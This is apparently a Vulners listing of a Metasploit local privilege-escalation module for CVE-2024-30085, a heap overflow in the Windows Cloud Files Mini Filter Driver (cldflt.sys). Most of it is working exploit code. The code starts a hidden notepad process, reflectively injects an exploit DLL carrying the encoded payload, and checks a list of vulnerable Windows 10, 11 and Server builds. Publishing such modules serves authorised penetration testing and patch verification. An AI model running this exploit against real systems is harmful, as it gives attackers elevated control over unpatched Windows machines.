Lucene search
K

Windows Cloud File Mini Filer Driver Heap Overflow

🗓️ 21 Mar 2025 18:50:21Reported by Alex Birnberg, ssd-disclosure, bwatters-r7Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 647 Views

Exploits a heap overflow in Windows Cloud Files Mini Filter Driver on specific Windows versions.

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Version
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Cloud File Mini Filer Driver Heap Overflow',
        'Description' => %q{
          This module exploits the Windows Cloud Files Mini FIlter Driver cldflt.sys on Windows workstation versions
          10_1809 through 11_23H2 and Windows server versions 2022 to 22_23H2.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alex Birnberg', # Original discovery
          'ssd-disclosure', # PoC
          'bwatters-r7' # msf module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter', 'shell'],
        'Targets' => [
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-12-19', # ?
        'References' => [
          ['CVE', '2024-30085'],
          ['URL', 'https://attackerkb.com/topics/EHiwxpT2Dp/cve-2024-30085'],
          ['URL', 'https://ssd-disclosure.com/ssd-advisory-cldflt-heap-based-overflow-pe/'],
          ['URL', 'https://starlabs.sg/blog/2024/all-i-want-for-christmas-is-a-cve-2024-30085-exploit/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [
            IOC_IN_LOGS
          ]
        }
      )
    )
  end

  def exploit
    print_status('Launching notepad to host the exploit...')
    notepad_path = get_notepad_pathname(ARCH_X64, client.sys.config.getenv('windir'), ARCH_X64)

    print_status("The notepad path is: #{notepad_path}")
    notepad_process = client.sys.process.execute(notepad_path, nil, { 'Hidden' => true })
    print_status("The notepad pid is: #{notepad_process.pid}")
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30085', 'cve-202430085-dll.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload,
      notepad_process.pid
    )
  end

  def validate_active_host
    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog('Could not connect to session', error: e)
    raise Msf::Exploit::Failed, 'Could not connect to session'
  end

  def validate_target
    if sysinfo['Architecture'] != ARCH_X64
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end
  end

  def target_compatible?(version)
    (version.build_number == Msf::WindowsVersion::Win10_2004 && version.revision_number <= 1415) ||
      (version.build_number == Msf::WindowsVersion::Win10_20H2 && version.revision_number <= 2965) ||
      (version.build_number == Msf::WindowsVersion::Win10_21H1 && version.revision_number <= 2364) ||
      (version.build_number == Msf::WindowsVersion::Win10_21H2 && version.revision_number < 4529) ||
      (version.build_number == Msf::WindowsVersion::Win10_22H2 && version.revision_number < 4529) ||
      (version.build_number == Msf::WindowsVersion::Win11_21H2 && version.revision_number < 3019) ||
      (version.build_number == Msf::WindowsVersion::Win11_22H2 && version.revision_number < 3737) ||
      (version.build_number == Msf::WindowsVersion::Win11_23H2 && version.revision_number < 3737) ||
      (version.build_number == Msf::WindowsVersion::Server2019 && version.revision_number < 5936) ||
      (version.build_number == Msf::WindowsVersion::Server2022 && version.revision_number < 2522) ||
      (version.build_number == Msf::WindowsVersion::Server2022_23H2 && version.revision_number < 950)
  end

  def check
    version = get_version_info
    vprint_status("OS version: #{version}")
    vprint_status("OS revision: #{version.revision_number}")
    return Exploit::CheckCode::Appears("Version #{version} appears vulnerable") if target_compatible?(version)

    return Exploit::CheckCode::Safe("Version #{version} is not vulnerable")
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jul 2026 19:03Current
8High risk
Vulners AI Score8
CVSS 3.17.8
EPSS0.15127
SSVC
647